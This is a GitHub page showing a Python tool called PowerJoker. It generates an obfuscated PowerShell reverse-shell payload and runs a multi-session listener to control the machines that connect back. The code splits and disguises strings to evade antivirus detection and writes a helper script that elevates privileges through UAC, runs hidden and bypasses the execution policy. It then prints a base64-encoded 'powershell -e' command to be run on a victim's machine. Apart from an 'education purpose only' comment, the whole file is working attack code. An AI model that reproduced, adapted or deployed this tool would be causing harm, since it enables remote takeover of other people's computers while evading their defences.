-
Notifications
You must be signed in to change notification settings - Fork 8
/
PowerJoker.py
444 lines (385 loc) · 19 KB
/
PowerJoker.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
import random
import time
import uuid
import base64
import argparse
import logging
import subprocess
from tqdm import tqdm
from colorama import init, Fore
import string
import socket
import threading
init(autoreset=True)
# - This tool is an obfuscated PowerShell payload designed to bypass RTP
# - and allow for RCE on a victim's machine. It opens a listener on a specified
# - port and waits for the victim to run it. The payload is created by replacing specific strings.
# - with randomly generated similar-looking strings to avoid detection
# - The tool also provides a base64-encoded version of the payload that can be copied and run on the victim's machine.
# - The tool's use requires knowledge of PowerShell and the ability to execute commands on the victim's machine.
# - Made by Adkali | GitHub
# - For education purpose only
# -------------- USING PARSER LIBRARY --------------
parser = argparse.ArgumentParser(description="Why so serious?")
parser.add_argument('-l', '-local', type=str, required=True, help='Local Machine')
parser.add_argument('-p', '-port', type=int, help='On What Port To Connect locally')
parser.add_argument('-r', '-raw', choices=["raw"], required=False, help="Raw Output [ Clean text ]")
parser.add_argument('-n', '-ngr', choices=["ngrok"], required=False, help="Ngrok tunnel")
args = parser.parse_args()
if not args.p:
print(f"\n[!] {Fore.RED}\033[1mNote:{Fore.RESET} Default port is 4444.")
args.p = 4444
time.sleep(0.5)
# SET THE BASIC CONFING FOR LOGGING
logging.basicConfig(level=logging.INFO)
# CREATE A LOGGER WITH __NAME__ FOR THE CURRENT MODULE
logger = logging.getLogger(__name__)
# --------------------- DEFINING COLORS ---------------------
def Pro_Colors():
yellow = Fore.YELLOW
red = Fore.RED
normal = Fore.RESET
cyan = Fore.CYAN
lightblue = Fore.LIGHTBLUE_EX
green = Fore.GREEN
return yellow, red, normal, cyan, lightblue, green
# Assign colors to name, call them after.
Yellow, Red, Normal, l_cyan, LightBlue, Green = Pro_Colors()
# --------------------- TREE ---------------------
MAIN = "├──"
TEE2 = "└──"
SPACE_PREFIX = " "
# --------------------- PJ ---------------------
def JOKER():
print(f'''
.------..------..------..------..------.
|{Yellow}P{Normal}.--. ||O.--. ||W.--. ||E.--. ||R.--. |
| :(): || :/\: || :/\: || (\/) || :(): |
| ()() || :\/: || :\/: || :\/: || ()() |
| '--'J|| '--'O|| '--'K|| '--'E|| '--'R|
`-----'`------'`------'`------'`------''')
# --------------------- UUIDS TO BE USED AFTER --------------------
def Generate_uuids():
# Using a list to store the random UUIDs that will be generated
random_uuid = []
# Make 10 UUIDs
for _ in range(10):
random_uuid.append("$" + str(uuid.uuid4()))
# Choose randomly a UUID from the list
random_uid_get = random.choice(random_uuid)
time.sleep(0.7)
return random_uid_get
# Split uuids at the start and grab it to be a variable
def spl_uuid():
# Cal the above function
uids = Generate_uuids()
print(f"\nRandomly UUID => {uids}")
# Using split, when '-' comes, grab the first random one to be use as a variable
split_uuid = uids.split("-")[0]
return split_uuid
# Random string to be used after on TCP connection
def random_strings():
# Randomly select variables which will be shown on the TCP PS connection
random_names = string.ascii_letters
# Random numbers between 6-11 to be use for the length of the string to be generated.
random_length = random.randrange(6, 12)
char2 = ''
# Making loop as the number of time defined by the random_length
for char in range(random_length):
# When iterated, assign letters as the random.range between 6-12.
char2 += random.choice(random_names)
return char2
def random_choice(variables):
"""
Making a dictionary with random strings.
using range, it will make it 5 times.
Assign each a different string following with a key as number, so I will be call it later-on.
"""
dict_variables = {
}
for i in range(variables):
# Use i as the key ( unique key for each string )
dict_variables[i] = random_strings()
return dict_variables
strings = random_strings()
random_string_pickup = random_choice(variables=5)
# ------------ DMV GDE PDE GTG --------------------
Command0 = ['$str = "TcP"+"C"+"li"+"e"+"nt";', '$reversed = -join ($str[-1..-($str.Length)])']
Command1 = ['$a = IEX $env:', 'SystemRoot\SysWow64\??ndowsPowerShe??', '\\v1.0\powershe??.exe;']
Command2 = ['$client = New-Object ', 'System.Net.Sockets.', 'TCPClient("0.0.0.0",0000)']
Command3 = ['$stream = ', '$client.GetStream();', '[byte[]]$bytes = 0..65535|%{0};']
Command4 = ['while(($i = $stream.Read($bytes, 0, $bytes.Length))', '-ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding)', '.GetString($bytes,0, $i);']
Command5 = ['$data = (New-Object -TypeName System.Text.ASCIIEncoding)', '.GetString($bytes,0, $i);']
# --------------------- WORDS TO GET-OFF --------------------- #
# S//Y//S//T//E//M//R//O//O//T
WordCharSystem1 = ["SysTemROot", "Syste?????", "Syst??r??t", "SyS?em?oo?", "SYSTEmRoot", "Sys???r???"
]
# S//y//s//t//e//m//3//2
WordCharSystem2 = ["SysWoW??", "SYSW?W6?", "SySwO???", "SYSW????"
]
# N//e//w//O//b//j//e//c//t
WordCharSystem3 = ["Ne''w-O''bje''ct", "N''ew-O''bj''ec''t", "N'e'W'-'o'B'J'e'C'T'",
"&('N'+'e'+'w'+'-'+'O'+'b'+'J'+'e'+'c'+'t')", "NeW-oB''JeCT", "&('New'+'-ObJect')",
"&('N'+'e'+'w'+'-ObJect')", "&('New'+'-'+'Ob'+'je'+'ct')", "&('Ne'+'w'+'-'+'Ob'+'je'+'ct')",
"&('n'+'E'+'W'+'-'+'Ob'+'Je'+'ct')", "&('New'+'-'+'Ob'+'je'+'c'+'t')"
]
# S//y//s//t//e//m//.//N//e//t//.//S//o//c//k//e//t//s
WordCharSystem4 = ["Sy''st''em.Net.Soc''kets.TcPClIeNt", "SyS''tEm.Net.SoC''kE''tS.TCPCLIENT",
"Sy''St''Em.NeT.So''CkE''tS.TCpCLient", "Sy''St''Em.NeT.So''CkE''tS.$str",
"('S'+'y'+'s'+'t'+'e'+'m'+'.'+'N'+'e'+'t'+'.'+'S'+'ockets.TCPClient')",
"('S'+'y'+'s'+'t'+'e'+'m'+'.'+'N'+'e'+'t'+'.'+'S'+'ockets.TCPcliEnt')",
"('S'+'y'+'s'+'t'+'e'+'m'+'.'+'N'+'e'+'t'+'.'+'S'+'ockets'+'.'+$str)"
]
# G//e//t//S//t//r//e//a//m
WordCharSystem5 = ["('Get'+'St'+'r'+'eam')", "('Get'+'Stream')", "('G'+'e'+'T'+'S'+'T'+'r'+'e'+'am')",
"('gEt'+'s'+'T'+'r'+'E'+'aM')", "('G'+'e'+'tStream')", "('g'+'Et'+'s'+'T'+'r'+'E'+'aM')"
]
# S//y//s//t//e//m//T//e//x//t//.//A//S//C//I//I//E//n//c//o//d//i//n//g
WordCharSystem6 = ["Sys''t''em.Te''xt.AS''CI''IEn''co''ding", "Sy''Ste''M.tExT.A''SCi''iEN''coding",
"S'y's't'e'm.T'e'x't.'A'S'C'I'IE'n'c'o'd'i'n'g"
]
# \x49\x46\x20\x59\x4F\x55\x20\x53\x45\x45\x20\x54\x48\x49\x53\x2C\x20\x59\x4F\x55\x20\x41\x52\x45\x20\x42\x4F\x52\x45\x44\x2E
WordCharSystem7 = ["$41b394758330c8=$3757856aa482c79977", "$37f=$91a10810c37a0f=$946c88e=$ecf0bb86",
"$b=$c=$9=$5=$d=$f=$c=$1=$4=$1=$4=$6=$a=$a=$2=$3=$e=$4=$3=$f=$2=$e=$a=$7=$a=$f=$0=$4=$d=$3=$1=$0",
"$e=$7=$f=$c=$f=$8=$e=$4=$9=$e=$3=$9=$a=$f=$3=$c=$f=$6=$a=$f=$2=$4=$6=$f=$d=$c=$f=$5=$3=$5=$d=$f",
]
# \x52\x69\x64\x64\x6C\x65\x3A\x20\x57\x68\x61\x74\x20\x6C\x6F\x76\x65\x73\x20\x74\x6F\x20\x73\x6C
# \x65\x65\x70\x3F\x0A\x41\x6E\x73\x77\x65\x72\x3A\x20\x44\x65\x66\x65\x6E\x64\x65\x72\x21\x20
WordCharSystem8 = ["$3dbfe2ebffe072727949d7cecc51573b", "$b15ff490cfd2aa65358d2e5e376c5dd2",
"$b91ae5f2a05e87e53ef4ca58305c600f", "$fb3c97733989bd69eede22507aab10df"
]
# Random UUIDS for later use
WordCharSystem9 = spl_uuid()
# --------------------- Join List Together --------------------- #
C0 = ''.join(Command0).strip()
C1 = ''.join(Command1).strip()
C2 = ''.join(Command2).strip()
C3 = ''.join(Command3).strip()
C4 = ''.join(Command4).strip()
C5 = ''.join(Command5).strip()
W = ', '.join(WordCharSystem1)
W2 = ', '.join(WordCharSystem2)
w3 = '. '.join(WordCharSystem3)
# --------------------- REPLACING --------------------- #
if "SYSTEMROOT" or "SystemRoot" in C1:
repl = random.choice(WordCharSystem1)
if "SysWow64" in C1:
repl2 = random.choice(WordCharSystem2)
if "New-Object" in C2:
repl3 = random.choice(WordCharSystem3)
if "System.Net.Sockets" in C2:
repl4 = random.choice(WordCharSystem4)
if "GetStream" in C3:
repl5 = random.choice(WordCharSystem5)
if "System.Text.ASCIIEncoding" in C4:
repl6 = random.choice(WordCharSystem6)
repl7 = None # Use after
repl8 = None # Use after
repl9 = None # Use after
# --------------------- WORDS TO CHECK FOR --------------------
def Bomb():
try:
logger.info(f"\n{Red}{MAIN}{Normal} Calculating Strings...")
with open('Payload.ps1', 'r') as file:
spl = file.read()
words_to_check = ["SYSTEMROOT", "New-Object", "GetStream", "ASCII", "System.Net.Sockets", "$client",
"$sendback", "$data"]
word_to_update = [repl, repl3, repl5, repl6, repl4, repl7, repl8, repl9]
num_words_to_check = len(words_to_check)
time.sleep(1)
print(f"{SPACE_PREFIX}{Yellow}{TEE2}{Normal}Checks For Replaceable Words....")
time.sleep(0.5)
with tqdm(total=num_words_to_check, bar_format="{l_bar}{bar}{r_bar}", colour='YELLOW') as pbar:
for i, word in enumerate(words_to_check):
pbar.update(1)
time.sleep(0.001)
if word not in spl:
pbar.write(
f"{SPACE_PREFIX}{SPACE_PREFIX}{TEE2}{i + 1}. {word} - {Yellow}Replaced{Normal} -->> {word_to_update[i]}")
time.sleep(1)
print(f"{SPACE_PREFIX}{SPACE_PREFIX}{SPACE_PREFIX}{TEE2}{LightBlue}{Normal}Just A Second...")
time.sleep(1.5)
print(f"{SPACE_PREFIX}{SPACE_PREFIX}{SPACE_PREFIX}{l_cyan}{TEE2}{Normal}Payload Generated...... ↓\n")
time.sleep(1.5)
except Exception as e:
logger.error(e)
# --------------------- CONTINUE MAIN PJ CODE BLOCK ---------------------
def Execute_privilege():
with open('Privilege.ps1', 'w') as run:
run.write(f'{privilege}')
run.close()
def Execute_Payload():
with open('Payload.ps1', 'w') as run2:
run2.write(f"{C0};\n")
run2.write('''$PJ = @("54", "43", "50", "43", "6C", "69", "65", "6E", "74");\n''')
run2.write("$TChar = $PJ | ForEach-Object { [char][convert]::ToInt32($_, 16) };\n")
run2.write("$PJChar = -join $TChar;\n")
run2.write(f";${random_string_pickup[0]} = {repl3} {repl4}('{args.l}',{args.p});\n")
run2.write(f"${random_string_pickup[2]} = ${random_string_pickup[0]}.{repl5}();[byte[]]$PJChar = 0..65535|%" + "{0};\n")
run2.write(f"while(($i = ${random_string_pickup[2]}.ReAd($PJChar, 0, $PJChar.LeNgTh)) -ne 0)" + "{;\n")
run2.write(f"$data = ({repl3} -TypENAme " + f"{repl6}).('Ge'+'tStRinG')($PJChar,0, $i);\n")
run2.write(f'''$sendback = (iex ". {{ $data }} 2>&1" | Ou''t-Str''ing );\n''')
run2.write(f"$J=$O=$K=$E=$R=$P=$W=$R = ${{sendback}} + '{LightBlue}JokerShell{Normal} ' + (pwd).Path + '> ';\n")
run2.write('''$s = ("{0}{1}{3}{2}"-f "se''nd","by","e","t"); $s = ([text.encoding]::ASCii).GetBYTeS($R);\n''')
run2.write(f"${random_string_pickup[2]}.Write($s,0,$s.Length);${random_string_pickup[2]}.Flush()"+"};"+f"${random_string_pickup[0]}.Close()\n")
run2.close()
time.sleep(1)
def Change_Payload(x):
global repl7, repl8, repl9
# Make Random MD5 Value Variables
repl7 = random.choice(WordCharSystem7)
repl8 = random.choice(WordCharSystem8)
repl9 = WordCharSystem9
with open(x, "r") as file:
file_content = file.read()
file_content = file_content.replace("$client", repl7)
file_content = file_content.replace("$sendback", repl8)
file_content = file_content.replace("sendback", repl8.split("$")[1])
file_content = file_content.replace("$data", repl9)
with open(x, 'w') as file:
file.write(file_content)
def Raw_Payload(x):
with open(x, "r") as f:
file = f.read()
print(file)
# -------------------------------- ENCODE TO BASE64 WHEN FINISH ------------------------------#
# A D K A L I #
# \x50\x6F\x77\x65\x72\x4A\x6F\x6B\x65\x72 #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def B64(FTD):
with open(FTD, 'rb') as file:
file_content = file.read()
return base64.b64encode(file_content).decode('utf-8')
# Maintain sessions using socket.
def start_server():
# Sessions to be stored and save when connections are made.
sessions = {}
# Listen to all interfaces
hostname = '0.0.0.0'
if not args.n:
# Local port [ not forwarding ]
port = args.p
else:
#use ngrok and prompt user to select a local port to listen when requests are coming
port = int(input(f"[?] {l_cyan}On which PORT to listen:{Normal} "))
# Continue normally
max_sessions = 5
server_socket = socket.socket()
server_socket.bind((hostname, port))
server_socket.listen(5)
print(f"\n{Red}[PJ]{Normal} Listening on {hostname}:{port}")
# Handle incoming connections
def accept_connections():
# As long sessions is smaller < 5, accept connections.
while len(sessions) < max_sessions:
client_socket, addr = server_socket.accept()
# Some Unique ID to be given for each connection made.
session_id = len(sessions) + 1
sessions[session_id] = [client_socket, addr]
print(f"\n[Successfully] Accepted connection from {addr[0]}:{addr[1]}\n")
def handle_buffer(x):
x = b''
while True:
information = client_socket.recv(1024)
x += information
# If return less than 1024 bytes, break
if len(information) < 1024:
break
return x
threading.Thread(target=accept_connections, daemon=True).start()
waiting_message_printed = False
while True:
# If there are no active sessions
# If the Waiting for sessions message hasn't been printed yet, print it ONCE.
if not sessions:
if not waiting_message_printed:
logger.info(f"{Yellow}Waiting for sessions...{Normal}")
# Mark the message as True
waiting_message_printed = True
continue
else:
# If there are sessions, reset to False ( message wont appear ).
if waiting_message_printed:
waiting_message_printed = False
try:
for session_id, (client_socket, session_addr) in sessions.items():
logger.info(f"Live Session --> [SESSION ID::{session_id}, {session_addr[0]}::{session_addr[1]} ]")
print(f"{Yellow}[Reminder]:{Normal} CTRL+C for switching BETWEEN sessions")
print(f"{Fore.LIGHTMAGENTA_EX}[Reminder]:{Normal} Hitting zero(0) will Kill sessions.")
print(f"{LightBlue}---{Normal}" * 15)
userinput = int(input(f"{Green}[?] Pick a session please (1-{len(sessions)}) OR press '0' for exit]:{Normal} "))
if userinput == 0:
print(f"{Red}\n[WhySoSerious?]{Normal}\n{Yellow}Adkali{Normal}\nGithub\n{LightBlue}Thank you!{Normal}")
for session_ends, (client_socket, client_address) in sessions.items():
client_socket.close()
exit(0)
if userinput in sessions:
client_socket, addr = sessions[userinput]
while True:
try:
command = input(f"{addr[0]}:{addr[1]} >>> {LightBlue}[PJSession]{Normal} {Yellow}{userinput}:{Normal} ")
if command.lower() == "quit":
client_socket.close()
del sessions[userinput]
logger.info(f"[!]Joker Session {userinput} lost!")
break
client_socket.send(command.encode())
response = handle_buffer(client_socket).decode('utf-8')
print(response)
except KeyboardInterrupt:
print("\n[?]Switching Jokers...")
time.sleep(2)
break
except (ConnectionResetError, BrokenPipeError):
logger.info(f"[!]Joker session {userinput} lost!")
del sessions[userinput]
break
else:
logger.error("[!] Wrong session ID.")
except ValueError:
print("Please enter a valid session number OR '0' to exit.")
# --------------------- MAIN CODE ---------------------
# Note: Replace 'BASE64_ENCODED_COMMAND_HERE' with the base64 payload.
privilege = '''
param([switch]$Elevated)
function Test-Admin {
$currentUser = New-Object Security.Principal.WindowsPrincipal $([Security.Principal.WindowsIdentity]::GetCurrent())
$currentUser.IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
Unblock-File '.\Privilege.ps1'
}
if ((Test-Admin) -eq $false) {
if ($elevated) {
# tried to elevate, did not work, aborting
} else {
Start-Process $env:''' + f'''{repl}\\''' + f'''\\{repl2}''' + '''\\??ndowsPowerShe??\\v1.0\powershe??.exe -Verb RunAs -ArgumentList ('-noprofile -WindowStyle hidden -file "{0}" -elevated' -f ($myinvocation.MyCommand.Definition))
}
exit
}
Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
$encodedCommand = 'BASE64_ENCODED_COMMAND_HERE'
$decodedCommand = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encodedCommand))
Invoke-Expression $decodedCommand
'''
def main():
Execute_privilege()
Execute_Payload()
Change_Payload("Payload.ps1")
JOKER()
Bomb()
FP = 'Payload.ps1'
B64(FTD=FP)
time.sleep(0.5)
print(f"[+] {Yellow}TIP{Normal}: use as: powershell -w hidden -EncodedCommand [PAYLOAD]")
print("PAYLOAD -> Copy and run:\n")
command = "iconv -f ASCII -t UTF-16LE Payload.ps1 | base64 -w 0"
base64_payload = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
base_bytes_out, base_err = base64_payload.communicate()
if args.r == "raw":
Raw_Payload(x=FP)
else:
print(f"powershell -e {base_bytes_out.decode('utf-8')}")
time.sleep(0.5)
start_server()
if __name__ == '__main__':
main()
subprocess.Popen('rm -r Payload.ps1', shell=True)